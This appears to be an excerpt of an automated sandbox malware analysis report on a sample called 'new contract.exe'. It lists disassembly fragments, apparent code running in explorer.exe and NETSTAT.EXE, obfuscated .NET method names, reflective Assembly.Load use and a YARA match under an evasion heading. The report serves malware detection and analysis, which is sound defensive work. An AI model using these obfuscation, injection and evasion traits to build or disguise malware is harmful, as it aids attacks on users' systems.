Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.cs .Net Code: U3QVC8bZLu System.Reflection.Assembly.Load(byte[])
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.cs .Net Code: U3QVC8bZLu System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041703B push ebx; retf 2_2_0041703C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_00416A52 push dword ptr [eax]; ret 2_2_00416A63
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_00405262 push ebx; ret 2_2_0040526F
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_004163E0 push ebp; ret 2_2_0041645B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0040A464 push es; retf 2_2_0040A466
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041D475 push eax; ret 2_2_0041D4C8
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041D4C2 push eax; ret 2_2_0041D4C8
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041D4CB push eax; ret 2_2_0041D532
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041D52C push eax; ret 2_2_0041D532
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041774A push cs; ret 2_2_0041774B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041AF82 push 00000074h; ret 2_2_0041AF8C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_015F225F pushad ; ret 2_2_015F27F9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_015F27FA pushad ; ret 2_2_015F27F9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016209AD push ecx; mov dword ptr [esp], ecx 2_2_016209B6
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_015F283D push eax; iretd 2_2_015F2858
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_015F1365 push eax; iretd 2_2_015F1369
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E6B02 push esp; retn 0000h 3_2_0E4E6B03
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E6B1E push esp; retn 0000h 3_2_0E4E6B1F
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E69B5 push esp; retn 0000h 3_2_0E4E6AE7
Source: C:\Windows\explorer.exe Code function: 3_2_0FB45B1E push esp; retn 0000h 3_2_0FB45B1F
Source: C:\Windows\explorer.exe Code function: 3_2_0FB45B02 push esp; retn 0000h 3_2_0FB45B03
Source: C:\Windows\explorer.exe Code function: 3_2_0FB459B5 push esp; retn 0000h 3_2_0FB45AE7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_006860DD push ecx; ret 5_2_006860F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031409AD push ecx; mov dword ptr [esp], ecx 5_2_031409B6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052703B push ebx; retf 5_2_0052703C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00515262 push ebx; ret 5_2_0051526F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_005263E0 push ebp; ret 5_2_0052645B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052D475 push eax; ret 5_2_0052D4C8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0051A464 push es; retf 5_2_0051A466
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052D4C2 push eax; ret 5_2_0052D4C8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052D4CB push eax; ret 5_2_0052D532
Source: new contract.exe Static PE information: section name: .text entropy: 7.83819492389617
Source: 0.2.new contract.exe.419def0.2.raw.unpack, SOwVvHMwinIr4CVPeB.cs High entropy of concatenated method names: 'Dispose', 'aI87mJBnb1', 'jKSqXh431R', 'm6ebbuCEuC', 'vyY7F10NkP', 'y1M7z1kJdj', 'ProcessDialogKey', 'mV5q8Nbj4n', 'K0dq71HYwv', 'nigqq3REnx'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, uf9aokYYeocPIOSosy.cs High entropy of concatenated method names: 'ekYAnEi5yt', 'g0kAMt1aRF', 'DEHuf1e4pw', 'UEMusKJwCK', 'ktHuKPGsns', 'R51u9myGsQ', 'KdkuJJqPRd', 'hhAuZSGJw2', 'IKcujRYdBA', 'tKIuxEF0Pj'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, QQTpKp75Qv0RWvQaoE.cs High entropy of concatenated method names: 'UxEOcxTPdk', 'NRMOX6GNmV', 'VwiOfIUlWg', 'xBfOsgDlPW', 'ysoO4sQIdk', 'VJZOKaADJj', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, BdAaLxlyFpvWDFdhFt.cs High entropy of concatenated method names: 'xAQY3xZshw', 'HFmYh3i4mA', 'rKMYCGXLbN', 'Wy1YEoRtNZ', 'A4xYnnAa9B', 'k1BYGWcf2J', 'bjvYMw44ve', 'CKhY0diM9Y', 'XFLYPudrcb', 'gGgYw5EWNs'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.cs High entropy of concatenated method names: 'Bt4TLdUcQu', 'NHiTpK9ow5', 'KLoTainbXn', 'UAfTuWPf6S', 'nbdTAqCCuH', 'YnuTkX58rc', 'ViXTYrwlcv', 'skSTBbWqr4', 'zLITURJXrC', 'MUsTIR6eRE'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, zEP9MvkRynobcNIcT7.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nM2qmOa6TN', 'RNrqF2inTm', 'PWeqzEgHDs', 'jluT8iXvyd', 'YrfT7E6FHA', 'rqCTqhgHJH', 'NkFTTqIebR', 'LpuL7NOyBiKZJDjlnug'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, nBjC5FWVGlwu26wPqR.cs High entropy of concatenated method names: 'ToString', 'QReSiZuu4y', 'tCFSXZJvKP', 'FM7Sfjq6FD', 'zjWSsuVrCk', 'ycxSKIgBpu', 'E29S9TCIva', 'id8SJvdwbo', 'MFiSZXNZls', 'IiYSjmqc9h'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, AnPH1ZOKvPImGHJVl0j.cs High entropy of concatenated method names: 'RCcH3scGmw', 'q5xHhRknv7', 'RIOHCUqrdO', 'Qh0HEYwQTV', 'VkKHnN3V5P', 'HH6HGjXqWU', 'liNHMDD4II', 'EwcH08fCoX', 'zCEHPVLjvv', 'rwYHw8TvBQ'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, fwA2K7BTejKMW9QUlG.cs High entropy of concatenated method names: 'Qq4kLtvjhW', 'WtJkaxlmWT', 'B2WkAZDOhk', 'CxqkYGJIV6', 'JYFkBOQOrV', 't97AlKkZTO', 'Hj4AvGwvoY', 'WqqADNWdSO', 'QfgAQsOHNx', 'OjLAm3KyAJ'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, FgGUaas92i9EvJTkCy.cs High entropy of concatenated method names: 'vVjoQVpX5s', 'C8poFeSSU0', 'g2yO8KaRGx', 'hcEO7rbR1Q', 'aCIoibJ0mf', 'bxootaQUfj', 'DyHoWwJTXW', 'cyto4uNumR', 'e20o1B8B7O', 'xW3oRVrtFL'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, OZjAZMZljeJfRcMEoc.cs High entropy of concatenated method names: 'ObICTEYAi', 'O4fExnimc', 'cunGFxp3K', 'mcTM2YKpa', 'KogPXsH93', 'Y3ww4GSxf', 'CBEd6tAbdqUNqjg8ee', 'tJ3qr5N4cvKdWuy8m3', 'OOkOG436q', 'Bnq2i4aaJ'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, cxtTtGunxt5IjcA9tT.cs High entropy of concatenated method names: 'R79OpiWflb', 'wxJOalib1K', 'TeeOuSohhM', 'iLnOAZ07T7', 'OjvOkRDY9N', 'ub5OYVAyjP', 'V1uOB1R9pR', 'TEYOUFybLl', 'xqtOIysPJm', 'iAWOdiEKSM'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, p7xNqEzxIiFeSoxNuY.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a4gHNvH8qE', 'jpoHgrwLh0', 'nk5HSXwhke', 'A1jHojnBdT', 'OcaHOrdgXk', 'Da4HHgDP09', 'mCfH291rO2'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, fgEBeMUyhH7sZUUckO.cs High entropy of concatenated method names: 'P53a4tNGPQ', 'QJLa1gleOS', 'QVRaRFxdt7', 'Cdxa59UVsr', 'bLSaluw5ed', 'JPAavJKSOf', 'UetaDvsP9X', 'yYYaQTDYbd', 'CTpam4JgxZ', 'cQDaFINaKP'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, zUws5HLCWDAIg0bvex.cs High entropy of concatenated method names: 'B2m7YMurfq', 'CtG7BU1pCS', 'BVr7IBy4gq', 'EcM7djjGJ3', 'ITY7glNjID', 'OZ37SZnApN', 'RQHLujujtC9OjhZxtH', 'DH6bVA9jcjNSmwxDaO', 'lDG77EqoZH', 'MA67TBJpmh'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, nNEK9grHOYMabirkn9.cs High entropy of concatenated method names: 'ujIoItZi25', 'SGGodoKJEL', 'ToString', 'rfOopVlZlm', 'KRxoavNDmw', 'hcrouVlpIW', 'THuoAg4jRl', 'h24ok8B1fG', 's46oY1JZR0', 'tMFoB1aDiS'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, fbgZAVOvkt4qOAMZfXo.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qLf24Ir8wS', 'NGK21E1qOX', 'RxZ2RSfmla', 'rFY25LrKK1', 'Vs12lZHDNb', 'Oqv2vBl4Pm', 'iVm2DFQKy2'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, UCFEImOOnS2ah0fT7nc.cs High entropy of concatenated method names: 'ToString', 'KL72TGf78t', 'DZ52VkL8Af', 'JNM2LdqlLM', 'gnp2psu8UG', 'bce2aM0kH3', 'xbf2uOCuKA', 'vEl2AABmK1', 'sE7BOo1IqYogjtGB4KC', 'miSiqq1qGpFXkZNcdkF'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, J7QEFHaSxHRZs0TFi6.cs High entropy of concatenated method names: 'jADH7uvKgG', 'ld0HTJ5aLB', 'NSUHVeSZWw', 'EKHHpxjwIN', 'IZPHaFFwsr', 'S8lHAtKT73', 'TD4HkDQMuR', 'ufhOD8HcxP', 'lePOQUHIV1', 'BaPOm3UsHC'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, aDjYvCEF62E4IZYMPn.cs High entropy of concatenated method names: 'UL1N0O4gTW', 't09NPdXcXf', 'ctRNcyAufi', 'UhINXQmb4n', 'RqYNsIQR0T', 'AacNKVbLuc', 'RKXNJmwcNm', 'SpPNZYtvo6', 'judNxAZ15u', 'djSNiYt2OE'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, y5AhBBpbkCOrjXLQSY.cs High entropy of concatenated method names: 'DqvYpIC0u9', 'OVxYuH61ux', 'EvkYkOKQZd', 'oeEkFYSIKM', 'pv1kz4KwAA', 'soAY89N83I', 'WPlY7IbfBE', 'edQYqsqiW2', 'kgSYTaxmvn', 'TOKYVXv6jQ'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, SQA3X2yg9UeEuDdc7y.cs High entropy of concatenated method names: 'rSDuEJHf9M', 'wpOuGSOAvV', 'Tlru0y0hIu', 'pLBuPXtVcM', 's7Augqus3c', 'CaSuS1YTis', 'xYyuoF6iuu', 'UEduOTjQBp', 'MMguH079jO', 'aIhu2iid4o'
Source: 0.2.new contract.exe.419def0.2.raw.unpack, el3wNP0WoRTZbNZSWq.cs High entropy of concatenated method names: 'MRxDNSZaKKuO7aBnuSr', 'smJafGZQ9yBPJn5jG3F', 'WXoN05ZiRTBBLSGJUTr', 'NNmkONbAE7', 'Im1kHWj8do', 'ND9k25D4bi', 'CQ7VVrZ2m33H4UGXLOX', 'ea8GMeZHAWPYgAafnKV'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, SOwVvHMwinIr4CVPeB.cs High entropy of concatenated method names: 'Dispose', 'aI87mJBnb1', 'jKSqXh431R', 'm6ebbuCEuC', 'vyY7F10NkP', 'y1M7z1kJdj', 'ProcessDialogKey', 'mV5q8Nbj4n', 'K0dq71HYwv', 'nigqq3REnx'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, uf9aokYYeocPIOSosy.cs High entropy of concatenated method names: 'ekYAnEi5yt', 'g0kAMt1aRF', 'DEHuf1e4pw', 'UEMusKJwCK', 'ktHuKPGsns', 'R51u9myGsQ', 'KdkuJJqPRd', 'hhAuZSGJw2', 'IKcujRYdBA', 'tKIuxEF0Pj'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, QQTpKp75Qv0RWvQaoE.cs High entropy of concatenated method names: 'UxEOcxTPdk', 'NRMOX6GNmV', 'VwiOfIUlWg', 'xBfOsgDlPW', 'ysoO4sQIdk', 'VJZOKaADJj', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BdAaLxlyFpvWDFdhFt.cs High entropy of concatenated method names: 'xAQY3xZshw', 'HFmYh3i4mA', 'rKMYCGXLbN', 'Wy1YEoRtNZ', 'A4xYnnAa9B', 'k1BYGWcf2J', 'bjvYMw44ve', 'CKhY0diM9Y', 'XFLYPudrcb', 'gGgYw5EWNs'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.cs High entropy of concatenated method names: 'Bt4TLdUcQu', 'NHiTpK9ow5', 'KLoTainbXn', 'UAfTuWPf6S', 'nbdTAqCCuH', 'YnuTkX58rc', 'ViXTYrwlcv', 'skSTBbWqr4', 'zLITURJXrC', 'MUsTIR6eRE'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, zEP9MvkRynobcNIcT7.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nM2qmOa6TN', 'RNrqF2inTm', 'PWeqzEgHDs', 'jluT8iXvyd', 'YrfT7E6FHA', 'rqCTqhgHJH', 'NkFTTqIebR', 'LpuL7NOyBiKZJDjlnug'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, nBjC5FWVGlwu26wPqR.cs High entropy of concatenated method names: 'ToString', 'QReSiZuu4y', 'tCFSXZJvKP', 'FM7Sfjq6FD', 'zjWSsuVrCk', 'ycxSKIgBpu', 'E29S9TCIva', 'id8SJvdwbo', 'MFiSZXNZls', 'IiYSjmqc9h'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, AnPH1ZOKvPImGHJVl0j.cs High entropy of concatenated method names: 'RCcH3scGmw', 'q5xHhRknv7', 'RIOHCUqrdO', 'Qh0HEYwQTV', 'VkKHnN3V5P', 'HH6HGjXqWU', 'liNHMDD4II', 'EwcH08fCoX', 'zCEHPVLjvv', 'rwYHw8TvBQ'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, fwA2K7BTejKMW9QUlG.cs High entropy of concatenated method names: 'Qq4kLtvjhW', 'WtJkaxlmWT', 'B2WkAZDOhk', 'CxqkYGJIV6', 'JYFkBOQOrV', 't97AlKkZTO', 'Hj4AvGwvoY', 'WqqADNWdSO', 'QfgAQsOHNx', 'OjLAm3KyAJ'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, FgGUaas92i9EvJTkCy.cs High entropy of concatenated method names: 'vVjoQVpX5s', 'C8poFeSSU0', 'g2yO8KaRGx', 'hcEO7rbR1Q', 'aCIoibJ0mf', 'bxootaQUfj', 'DyHoWwJTXW', 'cyto4uNumR', 'e20o1B8B7O', 'xW3oRVrtFL'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, OZjAZMZljeJfRcMEoc.cs High entropy of concatenated method names: 'ObICTEYAi', 'O4fExnimc', 'cunGFxp3K', 'mcTM2YKpa', 'KogPXsH93', 'Y3ww4GSxf', 'CBEd6tAbdqUNqjg8ee', 'tJ3qr5N4cvKdWuy8m3', 'OOkOG436q', 'Bnq2i4aaJ'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, cxtTtGunxt5IjcA9tT.cs High entropy of concatenated method names: 'R79OpiWflb', 'wxJOalib1K', 'TeeOuSohhM', 'iLnOAZ07T7', 'OjvOkRDY9N', 'ub5OYVAyjP', 'V1uOB1R9pR', 'TEYOUFybLl', 'xqtOIysPJm', 'iAWOdiEKSM'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, p7xNqEzxIiFeSoxNuY.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a4gHNvH8qE', 'jpoHgrwLh0', 'nk5HSXwhke', 'A1jHojnBdT', 'OcaHOrdgXk', 'Da4HHgDP09', 'mCfH291rO2'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, fgEBeMUyhH7sZUUckO.cs High entropy of concatenated method names: 'P53a4tNGPQ', 'QJLa1gleOS', 'QVRaRFxdt7', 'Cdxa59UVsr', 'bLSaluw5ed', 'JPAavJKSOf', 'UetaDvsP9X', 'yYYaQTDYbd', 'CTpam4JgxZ', 'cQDaFINaKP'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, zUws5HLCWDAIg0bvex.cs High entropy of concatenated method names: 'B2m7YMurfq', 'CtG7BU1pCS', 'BVr7IBy4gq', 'EcM7djjGJ3', 'ITY7glNjID', 'OZ37SZnApN', 'RQHLujujtC9OjhZxtH', 'DH6bVA9jcjNSmwxDaO', 'lDG77EqoZH', 'MA67TBJpmh'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, nNEK9grHOYMabirkn9.cs High entropy of concatenated method names: 'ujIoItZi25', 'SGGodoKJEL', 'ToString', 'rfOopVlZlm', 'KRxoavNDmw', 'hcrouVlpIW', 'THuoAg4jRl', 'h24ok8B1fG', 's46oY1JZR0', 'tMFoB1aDiS'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, fbgZAVOvkt4qOAMZfXo.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qLf24Ir8wS', 'NGK21E1qOX', 'RxZ2RSfmla', 'rFY25LrKK1', 'Vs12lZHDNb', 'Oqv2vBl4Pm', 'iVm2DFQKy2'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, UCFEImOOnS2ah0fT7nc.cs High entropy of concatenated method names: 'ToString', 'KL72TGf78t', 'DZ52VkL8Af', 'JNM2LdqlLM', 'gnp2psu8UG', 'bce2aM0kH3', 'xbf2uOCuKA', 'vEl2AABmK1', 'sE7BOo1IqYogjtGB4KC', 'miSiqq1qGpFXkZNcdkF'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, J7QEFHaSxHRZs0TFi6.cs High entropy of concatenated method names: 'jADH7uvKgG', 'ld0HTJ5aLB', 'NSUHVeSZWw', 'EKHHpxjwIN', 'IZPHaFFwsr', 'S8lHAtKT73', 'TD4HkDQMuR', 'ufhOD8HcxP', 'lePOQUHIV1', 'BaPOm3UsHC'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, aDjYvCEF62E4IZYMPn.cs High entropy of concatenated method names: 'UL1N0O4gTW', 't09NPdXcXf', 'ctRNcyAufi', 'UhINXQmb4n', 'RqYNsIQR0T', 'AacNKVbLuc', 'RKXNJmwcNm', 'SpPNZYtvo6', 'judNxAZ15u', 'djSNiYt2OE'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, y5AhBBpbkCOrjXLQSY.cs High entropy of concatenated method names: 'DqvYpIC0u9', 'OVxYuH61ux', 'EvkYkOKQZd', 'oeEkFYSIKM', 'pv1kz4KwAA', 'soAY89N83I', 'WPlY7IbfBE', 'edQYqsqiW2', 'kgSYTaxmvn', 'TOKYVXv6jQ'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, SQA3X2yg9UeEuDdc7y.cs High entropy of concatenated method names: 'rSDuEJHf9M', 'wpOuGSOAvV', 'Tlru0y0hIu', 'pLBuPXtVcM', 's7Augqus3c', 'CaSuS1YTis', 'xYyuoF6iuu', 'UEduOTjQBp', 'MMguH079jO', 'aIhu2iid4o'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, el3wNP0WoRTZbNZSWq.cs High entropy of concatenated method names: 'MRxDNSZaKKuO7aBnuSr', 'smJafGZQ9yBPJn5jG3F', 'WXoN05ZiRTBBLSGJUTr', 'NNmkONbAE7', 'Im1kHWj8do', 'ND9k25D4bi', 'CQ7VVrZ2m33H4UGXLOX', 'ea8GMeZHAWPYgAafnKV'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, SOwVvHMwinIr4CVPeB.cs High entropy of concatenated method names: 'Dispose', 'aI87mJBnb1', 'jKSqXh431R', 'm6ebbuCEuC', 'vyY7F10NkP', 'y1M7z1kJdj', 'ProcessDialogKey', 'mV5q8Nbj4n', 'K0dq71HYwv', 'nigqq3REnx'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, uf9aokYYeocPIOSosy.cs High entropy of concatenated method names: 'ekYAnEi5yt', 'g0kAMt1aRF', 'DEHuf1e4pw', 'UEMusKJwCK', 'ktHuKPGsns', 'R51u9myGsQ', 'KdkuJJqPRd', 'hhAuZSGJw2', 'IKcujRYdBA', 'tKIuxEF0Pj'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, QQTpKp75Qv0RWvQaoE.cs High entropy of concatenated method names: 'UxEOcxTPdk', 'NRMOX6GNmV', 'VwiOfIUlWg', 'xBfOsgDlPW', 'ysoO4sQIdk', 'VJZOKaADJj', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BdAaLxlyFpvWDFdhFt.cs High entropy of concatenated method names: 'xAQY3xZshw', 'HFmYh3i4mA', 'rKMYCGXLbN', 'Wy1YEoRtNZ', 'A4xYnnAa9B', 'k1BYGWcf2J', 'bjvYMw44ve', 'CKhY0diM9Y', 'XFLYPudrcb', 'gGgYw5EWNs'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.cs High entropy of concatenated method names: 'Bt4TLdUcQu', 'NHiTpK9ow5', 'KLoTainbXn', 'UAfTuWPf6S', 'nbdTAqCCuH', 'YnuTkX58rc', 'ViXTYrwlcv', 'skSTBbWqr4', 'zLITURJXrC', 'MUsTIR6eRE'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, zEP9MvkRynobcNIcT7.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nM2qmOa6TN', 'RNrqF2inTm', 'PWeqzEgHDs', 'jluT8iXvyd', 'YrfT7E6FHA', 'rqCTqhgHJH', 'NkFTTqIebR', 'LpuL7NOyBiKZJDjlnug'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, nBjC5FWVGlwu26wPqR.cs High entropy of concatenated method names: 'ToString', 'QReSiZuu4y', 'tCFSXZJvKP', 'FM7Sfjq6FD', 'zjWSsuVrCk', 'ycxSKIgBpu', 'E29S9TCIva', 'id8SJvdwbo', 'MFiSZXNZls', 'IiYSjmqc9h'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, AnPH1ZOKvPImGHJVl0j.cs High entropy of concatenated method names: 'RCcH3scGmw', 'q5xHhRknv7', 'RIOHCUqrdO', 'Qh0HEYwQTV', 'VkKHnN3V5P', 'HH6HGjXqWU', 'liNHMDD4II', 'EwcH08fCoX', 'zCEHPVLjvv', 'rwYHw8TvBQ'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, fwA2K7BTejKMW9QUlG.cs High entropy of concatenated method names: 'Qq4kLtvjhW', 'WtJkaxlmWT', 'B2WkAZDOhk', 'CxqkYGJIV6', 'JYFkBOQOrV', 't97AlKkZTO', 'Hj4AvGwvoY', 'WqqADNWdSO', 'QfgAQsOHNx', 'OjLAm3KyAJ'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, FgGUaas92i9EvJTkCy.cs High entropy of concatenated method names: 'vVjoQVpX5s', 'C8poFeSSU0', 'g2yO8KaRGx', 'hcEO7rbR1Q', 'aCIoibJ0mf', 'bxootaQUfj', 'DyHoWwJTXW', 'cyto4uNumR', 'e20o1B8B7O', 'xW3oRVrtFL'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, OZjAZMZljeJfRcMEoc.cs High entropy of concatenated method names: 'ObICTEYAi', 'O4fExnimc', 'cunGFxp3K', 'mcTM2YKpa', 'KogPXsH93', 'Y3ww4GSxf', 'CBEd6tAbdqUNqjg8ee', 'tJ3qr5N4cvKdWuy8m3', 'OOkOG436q', 'Bnq2i4aaJ'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, cxtTtGunxt5IjcA9tT.cs High entropy of concatenated method names: 'R79OpiWflb', 'wxJOalib1K', 'TeeOuSohhM', 'iLnOAZ07T7', 'OjvOkRDY9N', 'ub5OYVAyjP', 'V1uOB1R9pR', 'TEYOUFybLl', 'xqtOIysPJm', 'iAWOdiEKSM'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, p7xNqEzxIiFeSoxNuY.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a4gHNvH8qE', 'jpoHgrwLh0', 'nk5HSXwhke', 'A1jHojnBdT', 'OcaHOrdgXk', 'Da4HHgDP09', 'mCfH291rO2'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, fgEBeMUyhH7sZUUckO.cs High entropy of concatenated method names: 'P53a4tNGPQ', 'QJLa1gleOS', 'QVRaRFxdt7', 'Cdxa59UVsr', 'bLSaluw5ed', 'JPAavJKSOf', 'UetaDvsP9X', 'yYYaQTDYbd', 'CTpam4JgxZ', 'cQDaFINaKP'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, zUws5HLCWDAIg0bvex.cs High entropy of concatenated method names: 'B2m7YMurfq', 'CtG7BU1pCS', 'BVr7IBy4gq', 'EcM7djjGJ3', 'ITY7glNjID', 'OZ37SZnApN', 'RQHLujujtC9OjhZxtH', 'DH6bVA9jcjNSmwxDaO', 'lDG77EqoZH', 'MA67TBJpmh'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, nNEK9grHOYMabirkn9.cs High entropy of concatenated method names: 'ujIoItZi25', 'SGGodoKJEL', 'ToString', 'rfOopVlZlm', 'KRxoavNDmw', 'hcrouVlpIW', 'THuoAg4jRl', 'h24ok8B1fG', 's46oY1JZR0', 'tMFoB1aDiS'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, fbgZAVOvkt4qOAMZfXo.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qLf24Ir8wS', 'NGK21E1qOX', 'RxZ2RSfmla', 'rFY25LrKK1', 'Vs12lZHDNb', 'Oqv2vBl4Pm', 'iVm2DFQKy2'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, UCFEImOOnS2ah0fT7nc.cs High entropy of concatenated method names: 'ToString', 'KL72TGf78t', 'DZ52VkL8Af', 'JNM2LdqlLM', 'gnp2psu8UG', 'bce2aM0kH3', 'xbf2uOCuKA', 'vEl2AABmK1', 'sE7BOo1IqYogjtGB4KC', 'miSiqq1qGpFXkZNcdkF'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, J7QEFHaSxHRZs0TFi6.cs High entropy of concatenated method names: 'jADH7uvKgG', 'ld0HTJ5aLB', 'NSUHVeSZWw', 'EKHHpxjwIN', 'IZPHaFFwsr', 'S8lHAtKT73', 'TD4HkDQMuR', 'ufhOD8HcxP', 'lePOQUHIV1', 'BaPOm3UsHC'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, aDjYvCEF62E4IZYMPn.cs High entropy of concatenated method names: 'UL1N0O4gTW', 't09NPdXcXf', 'ctRNcyAufi', 'UhINXQmb4n', 'RqYNsIQR0T', 'AacNKVbLuc', 'RKXNJmwcNm', 'SpPNZYtvo6', 'judNxAZ15u', 'djSNiYt2OE'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, y5AhBBpbkCOrjXLQSY.cs High entropy of concatenated method names: 'DqvYpIC0u9', 'OVxYuH61ux', 'EvkYkOKQZd', 'oeEkFYSIKM', 'pv1kz4KwAA', 'soAY89N83I', 'WPlY7IbfBE', 'edQYqsqiW2', 'kgSYTaxmvn', 'TOKYVXv6jQ'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, SQA3X2yg9UeEuDdc7y.cs High entropy of concatenated method names: 'rSDuEJHf9M', 'wpOuGSOAvV', 'Tlru0y0hIu', 'pLBuPXtVcM', 's7Augqus3c', 'CaSuS1YTis', 'xYyuoF6iuu', 'UEduOTjQBp', 'MMguH079jO', 'aIhu2iid4o'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, el3wNP0WoRTZbNZSWq.cs High entropy of concatenated method names: 'MRxDNSZaKKuO7aBnuSr', 'smJafGZQ9yBPJn5jG3F', 'WXoN05ZiRTBBLSGJUTr', 'NNmkONbAE7', 'Im1kHWj8do', 'ND9k25D4bi', 'CQ7VVrZ2m33H4UGXLOX', 'ea8GMeZHAWPYgAafnKV'
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: new contract.exe PID: 7424, type: MEMORYSTR
